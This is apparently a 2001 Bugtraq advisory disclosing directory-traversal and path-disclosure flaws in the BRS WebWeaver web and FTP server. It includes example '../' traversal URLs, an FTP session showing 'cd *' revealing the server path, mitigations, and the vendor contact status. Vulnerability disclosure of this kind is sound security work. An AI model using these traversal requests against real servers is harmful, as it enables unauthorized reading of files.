[20508] in bugtraq
Vulnerabilities in BRS WebWeaver
daemon@ATHENA.MIT.EDU (joetesta@HUSHMAIL.COM)
Mon Apr 30 02:48:52 2001
Content-type: multipart/mixed;
boundary="Hushpart_boundary_VOXHqUfoJPieaabqQkHXnNfFDRNpLmrb"
Mime-version: 1.0
Message-ID: <200104281953.MAA08631@user7.hushmail.com>
Date: Sat, 28 Apr 2001 15:57:20 -0800
Reply-To: joetesta@HUSHMAIL.COM
From: joetesta@HUSHMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
--Hushpart_boundary_VOXHqUfoJPieaabqQkHXnNfFDRNpLmrb
Content-type: text/plain
----- Begin Hush Signed Message from joetesta@hushmail.com -----
Vulnerabilities in BRS WebWeaver
Overview
BRS WebWeaver v0.63 is a combined ftp and web server available from
http://bsoutham.home.dhs.org. Vulnerabilities exist in the web
server which allow remote users to break out of the web root using
relative paths (ie: '..', '...'). In addition, the ftp server
can be made to disclose the physical path of the ftp root.
Details
The following URLs demonstrate the problem with the web server:
http://localhost/syshelp/../[any file outside the web root]
http://localhost/sysimages/../[any file outside the web root]
http://localhost/scripts/../[any file outside the web root]
The following is an illustration of the problem with the ftp server:
>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
ftp>
Solution
The web server root traversal vulnerabilities can be prevented by removing
all user-defined aliases (ie: 'syshelp', 'sysimages') as well as the
ISAPI/CGI alias (ie: 'scripts'). There is no solution for the ftp root
disclosure vulnerability.
Vendor Status
Blaine R Southam was contacted via <bsoutham@iname.com> on
Saturday, April 21, 2001. No reply was received.
- Joe Testa
e-mail: joetesta@hushmail.com
web page: http://hogs.rit.edu/~joet
AIM: LordSpankatron
----- Begin Hush Signature v1.3 -----
CVqvkyjBiGMOAQcLrFNKLcRZLBW13KOe9d2JMMIzTrZhsT9l2ihsNcFO3G/yGOL2qAIx
kMC9Z2ijFy/RRJEC02qDgHcL1vEMEq2LlU3cpY+zb3yZ8jb6AarulkaGbw4eEjD1R7ER
t/Gyq2X++pHMSlsMU7151N9H5Vl4WcjsU/7kJQHqgglKD2EtjhdHi3BgWnBhyqVa8Mp/
IaVjpWAC3Pxa3kp3jdJ2IE4OE399GMh1brJJGAb/spWiAXbE+pTKq6Llu35DCex2QgtL
n0LjgAsWom6PdZzCFyi6nfLvToMt1xr5TbJDnG0dvS6FYjQbiubcLRUEi+K1qSvE5+RD
N+yAyPda+trSaJLd1O6o/kNse2KvntAtlexC/hRdrPxjX5F0guoFfaNhgPBQrssInM/+
gk6lgWNaEUV/AxyCRUvqenkMkBd19alQ5M6dY+XEpdDIB4/Mo9xic/ekbSmqcNmOHKyX
T/DX0EMDxts6GI715LXY0Imv1jx52X1CuMGvBaVtuOal
----- End Hush Signature v1.3 -----
This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools
Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_VOXHqUfoJPieaabqQkHXnNfFDRNpLmrb--
